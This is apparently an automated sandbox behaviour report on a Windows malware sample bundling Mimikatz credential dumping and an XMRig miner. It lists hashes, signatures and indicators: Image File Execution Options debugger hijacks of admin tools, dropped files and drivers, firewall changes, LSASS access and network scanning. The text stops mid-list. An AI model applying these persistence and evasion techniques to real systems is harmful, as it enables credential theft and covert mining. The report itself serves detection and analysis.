Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
05-02-2025 11:32
Behavioral task
behavioral1
Sample
2025-02-05_987f2523a6d3545a624d88e62406b355_hacktools_icedid_mimikatz.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
2025-02-05_987f2523a6d3545a624d88e62406b355_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20250129-en
General
-
Target
2025-02-05_987f2523a6d3545a624d88e62406b355_hacktools_icedid_mimikatz.exe
-
Size
17.4MB
-
MD5
987f2523a6d3545a624d88e62406b355
-
SHA1
c50ef87b7d0ddd91c006f34445114b74e2ee6ee4
-
SHA256
e601567ebff0d3d31550376900baa559613e1c6fcdccb409a085e23387a4cd3e
-
SHA512
0cfaecdd40c0544a18ed301cb1d68c2be01a2f44ad1ba4f33367bfe9bb82b341dab9f594d05e9cac739944cff1cef8aa1ef746494fb2eeb218d82f6ce4fb9dc1
-
SSDEEP
196608:I6mknGzwHdOgEPHd9BbX/nivPlTXTYrE6mknGzwHdOgEPHd9BbX/nivPlTXTYrX:Sjz0EJ7/iv1Vjz0EJ7/iv1G
Malware Config
Signatures
-
Disables service(s) 3 TTPs
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2828 created 1016 2828 iugnatn.exe 17 -
Xmrig family
-
Contacts a large (26673) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 12 IoCs
resource yara_rule behavioral1/memory/2148-193-0x000000013F490000-0x000000013F5B0000-memory.dmp xmrig behavioral1/memory/2148-203-0x000000013F490000-0x000000013F5B0000-memory.dmp xmrig behavioral1/memory/2148-229-0x000000013F490000-0x000000013F5B0000-memory.dmp xmrig behavioral1/memory/2148-242-0x000000013F490000-0x000000013F5B0000-memory.dmp xmrig behavioral1/memory/2148-243-0x000000013F490000-0x000000013F5B0000-memory.dmp xmrig behavioral1/memory/2148-244-0x000000013F490000-0x000000013F5B0000-memory.dmp xmrig behavioral1/memory/2148-248-0x000000013F490000-0x000000013F5B0000-memory.dmp xmrig behavioral1/memory/2148-498-0x000000013F490000-0x000000013F5B0000-memory.dmp xmrig behavioral1/memory/2148-499-0x000000013F490000-0x000000013F5B0000-memory.dmp xmrig behavioral1/memory/2148-502-0x000000013F490000-0x000000013F5B0000-memory.dmp xmrig behavioral1/memory/2148-719-0x000000013F490000-0x000000013F5B0000-memory.dmp xmrig behavioral1/memory/2148-720-0x000000013F490000-0x000000013F5B0000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 7 IoCs
resource yara_rule behavioral1/memory/1540-0-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral1/memory/1540-4-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral1/files/0x0008000000016d49-5.dat mimikatz behavioral1/memory/2356-9-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral1/memory/1700-137-0x000000013FF50000-0x000000014003E000-memory.dmp mimikatz behavioral1/memory/2828-165-0x0000000002DC0000-0x0000000002EE0000-memory.dmp mimikatz behavioral1/memory/2828-192-0x0000000002DC0000-0x0000000002EE0000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts iugnatn.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts iugnatn.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe iugnatn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iugnatn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iugnatn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iugnatn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe iugnatn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iugnatn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iugnatn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe iugnatn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iugnatn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe iugnatn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iugnatn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe iugnatn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iugnatn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe iugnatn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iugnatn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iugnatn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe iugnatn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iugnatn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe iugnatn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe iugnatn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iugnatn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iugnatn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iugnatn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iugnatn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe iugnatn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe iugnatn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iugnatn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe iugnatn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe iugnatn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iugnatn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe iugnatn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iugnatn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iugnatn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iugnatn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe iugnatn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe iugnatn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe iugnatn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe iugnatn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe iugnatn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe iugnatn.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 2592 netsh.exe 1848 netsh.exe -
Executes dropped EXE 19 IoCs
pid Process 2356 iugnatn.exe 2828 iugnatn.exe 2820 wpcap.exe 440 nvjihepny.exe 1700 vfshost.exe 1040 tlnhsrrfm.exe 1844 xohudmc.exe 2180 ooeaya.exe 2148 reirjf.exe 1780 tlnhsrrfm.exe 1272 tlnhsrrfm.exe 2676 tlnhsrrfm.exe 2572 tlnhsrrfm.exe 2744 tlnhsrrfm.exe 1288 tlnhsrrfm.exe 544 tlnhsrrfm.exe 2212 iugnatn.exe 1704 eenjufmqs.exe 2696 iugnatn.exe -
Loads dropped DLL 25 IoCs
pid Process 1908 cmd.exe 1908 cmd.exe 972 cmd.exe 2820 wpcap.exe 2820 wpcap.exe 2820 wpcap.exe 2820 wpcap.exe 2820 wpcap.exe 2248 cmd.exe 440 nvjihepny.exe 440 nvjihepny.exe 904 cmd.exe 904 cmd.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 440 cmd.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 16 ifconfig.me 17 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 12 IoCs
description ioc Process File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 iugnatn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EC98FD874C34E9667158FBB7DEFBD82F iugnatn.exe File created C:\Windows\SysWOW64\ooeaya.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\ooeaya.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 iugnatn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EC98FD874C34E9667158FBB7DEFBD82F iugnatn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat iugnatn.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe -
resource yara_rule behavioral1/files/0x000500000001a3e8-132.dat upx behavioral1/memory/1700-135-0x000000013FF50000-0x000000014003E000-memory.dmp upx behavioral1/memory/1700-137-0x000000013FF50000-0x000000014003E000-memory.dmp upx behavioral1/files/0x000500000001a46d-139.dat upx behavioral1/memory/1040-143-0x000000013FDC0000-0x000000013FE1B000-memory.dmp upx behavioral1/memory/2828-165-0x0000000002DC0000-0x0000000002EE0000-memory.dmp upx behavioral1/memory/2148-166-0x000000013F490000-0x000000013F5B0000-memory.dmp upx behavioral1/files/0x000500000001a470-164.dat upx behavioral1/memory/1040-172-0x000000013FDC0000-0x000000013FE1B000-memory.dmp upx behavioral1/memory/1780-178-0x000000013FDB0000-0x000000013FE0B000-memory.dmp upx behavioral1/memory/1780-181-0x000000013FDB0000-0x000000013FE0B000-memory.dmp upx behavioral1/memory/1272-188-0x000000013F540000-0x000000013F59B000-memory.dmp upx behavioral1/memory/1272-190-0x000000013F540000-0x000000013F59B000-memory.dmp upx behavioral1/memory/2148-193-0x000000013F490000-0x000000013F5B0000-memory.dmp upx behavioral1/memory/2676-199-0x000000013FA10000-0x000000013FA6B000-memory.dmp upx behavioral1/memory/2676-201-0x000000013FA10000-0x000000013FA6B000-memory.dmp upx behavioral1/memory/2148-203-0x000000013F490000-0x000000013F5B0000-memory.dmp upx behavioral1/memory/2828-206-0x0000000001A10000-0x0000000001A6B000-memory.dmp upx behavioral1/memory/2572-209-0x000000013F030000-0x000000013F08B000-memory.dmp upx behavioral1/memory/2744-215-0x000000013F140000-0x000000013F19B000-memory.dmp upx behavioral1/memory/2744-217-0x000000013F140000-0x000000013F19B000-memory.dmp upx behavioral1/memory/1288-224-0x000000013FAA0000-0x000000013FAFB000-memory.dmp upx behavioral1/memory/1288-226-0x000000013FAA0000-0x000000013FAFB000-memory.dmp upx behavioral1/memory/2148-229-0x000000013F490000-0x000000013F5B0000-memory.dmp upx behavioral1/memory/544-233-0x000000013FC80000-0x000000013FCDB000-memory.dmp upx behavioral1/memory/544-235-0x000000013FC80000-0x000000013FCDB000-memory.dmp upx behavioral1/memory/2148-242-0x000000013F490000-0x000000013F5B0000-memory.dmp upx behavioral1/memory/2148-243-0x000000013F490000-0x000000013F5B0000-memory.dmp upx behavioral1/memory/2148-244-0x000000013F490000-0x000000013F5B0000-memory.dmp upx behavioral1/memory/2148-248-0x000000013F490000-0x000000013F5B0000-memory.dmp upx behavioral1/memory/2148-498-0x000000013F490000-0x000000013F5B0000-memory.dmp upx behavioral1/memory/2148-499-0x000000013F490000-0x000000013F5B0000-memory.dmp upx behavioral1/memory/2148-502-0x000000013F490000-0x000000013F5B0000-memory.dmp upx behavioral1/memory/2148-719-0x000000013F490000-0x000000013F5B0000-memory.dmp upx behavioral1/memory/2148-720-0x000000013F490000-0x000000013F5B0000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\bhnrmjzve\UnattendGC\specials\ssleay32.dll iugnatn.exe File created C:\Windows\bhnrmjzve\UnattendGC\svschost.xml iugnatn.exe File created C:\Windows\bhnrmjzve\UnattendGC\specials\docmicfg.xml iugnatn.exe File created C:\Windows\clyfknye\vimpcsvc.xml iugnatn.exe File opened for modification C:\Windows\bhnrmjzve\ylfnetdkf\Packet.dll iugnatn.exe File created C:\Windows\bhnrmjzve\UnattendGC\specials\xdvl-0.dll iugnatn.exe File created C:\Windows\bhnrmjzve\UnattendGC\specials\svschost.exe iugnatn.exe File created C:\Windows\bhnrmjzve\UnattendGC\specials\schoedcl.exe iugnatn.exe File created C:\Windows\bhnrmjzve\UnattendGC\specials\svschost.xml iugnatn.exe File opened for modification C:\Windows\clyfknye\svschost.xml iugnatn.exe File opened for modification C:\Windows\clyfknye\vimpcsvc.xml iugnatn.exe File opened for modification C:\Windows\clyfknye\docmicfg.xml iugnatn.exe File created C:\Windows\bhnrmjzve\UnattendGC\specials\trch-1.dll iugnatn.exe File created C:\Windows\bhnrmjzve\UnattendGC\Shellcode.ini iugnatn.exe File created C:\Windows\bhnrmjzve\UnattendGC\specials\cnli-1.dll iugnatn.exe File created C:\Windows\bhnrmjzve\UnattendGC\specials\docmicfg.exe iugnatn.exe File created C:\Windows\bhnrmjzve\UnattendGC\vimpcsvc.xml iugnatn.exe File created C:\Windows\clyfknye\docmicfg.xml iugnatn.exe File created C:\Windows\bhnrmjzve\ylfnetdkf\eenjufmqs.exe iugnatn.exe File created C:\Windows\clyfknye\svschost.xml iugnatn.exe File created C:\Windows\clyfknye\spoolsrv.xml iugnatn.exe File created C:\Windows\bhnrmjzve\UnattendGC\specials\crli-0.dll iugnatn.exe File created C:\Windows\bhnrmjzve\UnattendGC\AppCapture32.dll iugnatn.exe File created C:\Windows\bhnrmjzve\upbdrjv\swrpwe.exe iugnatn.exe File opened for modification C:\Windows\clyfknye\schoedcl.xml iugnatn.exe File created C:\Windows\bhnrmjzve\UnattendGC\specials\vimpcsvc.exe iugnatn.exe File created C:\Windows\bhnrmjzve\UnattendGC\specials\schoedcl.xml iugnatn.exe File created C:\Windows\bhnrmjzve\Corporate\mimilib.dll iugnatn.exe File created C:\Windows\ime\iugnatn.exe iugnatn.exe File opened for modification C:\Windows\clyfknye\iugnatn.exe 2025-02-05_987f2523a6d3545a624d88e62406b355_hacktools_icedid_mimikatz.exe File opened for modification C:\Windows\clyfknye\spoolsrv.xml iugnatn.exe File created C:\Windows\bhnrmjzve\UnattendGC\specials\coli-0.dll iugnatn.exe File opened for modification C:\Windows\bhnrmjzve\Corporate\log.txt cmd.exe File created C:\Windows\bhnrmjzve\ylfnetdkf\wpcap.exe iugnatn.exe File created C:\Windows\bhnrmjzve\UnattendGC\specials\tibe-2.dll iugnatn.exe File created C:\Windows\bhnrmjzve\UnattendGC\spoolsrv.xml iugnatn.exe File created C:\Windows\bhnrmjzve\UnattendGC\docmicfg.xml iugnatn.exe File created C:\Windows\bhnrmjzve\UnattendGC\specials\spoolsrv.xml iugnatn.exe File created C:\Windows\clyfknye\schoedcl.xml iugnatn.exe File created C:\Windows\bhnrmjzve\Corporate\mimidrv.sys iugnatn.exe File created C:\Windows\bhnrmjzve\UnattendGC\specials\libxml2.dll iugnatn.exe File created C:\Windows\bhnrmjzve\UnattendGC\schoedcl.xml iugnatn.exe File created C:\Windows\bhnrmjzve\UnattendGC\AppCapture64.dll iugnatn.exe File created C:\Windows\bhnrmjzve\UnattendGC\specials\posh-0.dll iugnatn.exe File created C:\Windows\bhnrmjzve\UnattendGC\specials\vimpcsvc.xml iugnatn.exe File created C:\Windows\bhnrmjzve\ylfnetdkf\Packet.dll iugnatn.exe File opened for modification C:\Windows\bhnrmjzve\ylfnetdkf\Result.txt eenjufmqs.exe File created C:\Windows\clyfknye\iugnatn.exe 2025-02-05_987f2523a6d3545a624d88e62406b355_hacktools_icedid_mimikatz.exe File created C:\Windows\bhnrmjzve\UnattendGC\specials\tucl-1.dll iugnatn.exe File created C:\Windows\bhnrmjzve\ylfnetdkf\scan.bat iugnatn.exe File created C:\Windows\bhnrmjzve\ylfnetdkf\nvjihepny.exe iugnatn.exe File created C:\Windows\bhnrmjzve\ylfnetdkf\ip.txt iugnatn.exe File created C:\Windows\bhnrmjzve\UnattendGC\specials\zlib1.dll iugnatn.exe File created C:\Windows\bhnrmjzve\UnattendGC\specials\exma-1.dll iugnatn.exe File created C:\Windows\bhnrmjzve\UnattendGC\specials\trfo-2.dll iugnatn.exe File created C:\Windows\bhnrmjzve\UnattendGC\specials\ucl.dll iugnatn.exe File created C:\Windows\bhnrmjzve\ylfnetdkf\wpcap.dll iugnatn.exe File created C:\Windows\bhnrmjzve\UnattendGC\specials\spoolsrv.exe iugnatn.exe File created C:\Windows\bhnrmjzve\Corporate\vfshost.exe iugnatn.exe File created C:\Windows\bhnrmjzve\UnattendGC\specials\libeay32.dll iugnatn.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 292 sc.exe 3060 sc.exe 2188 sc.exe 1852 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-02-05_987f2523a6d3545a624d88e62406b355_hacktools_icedid_mimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened 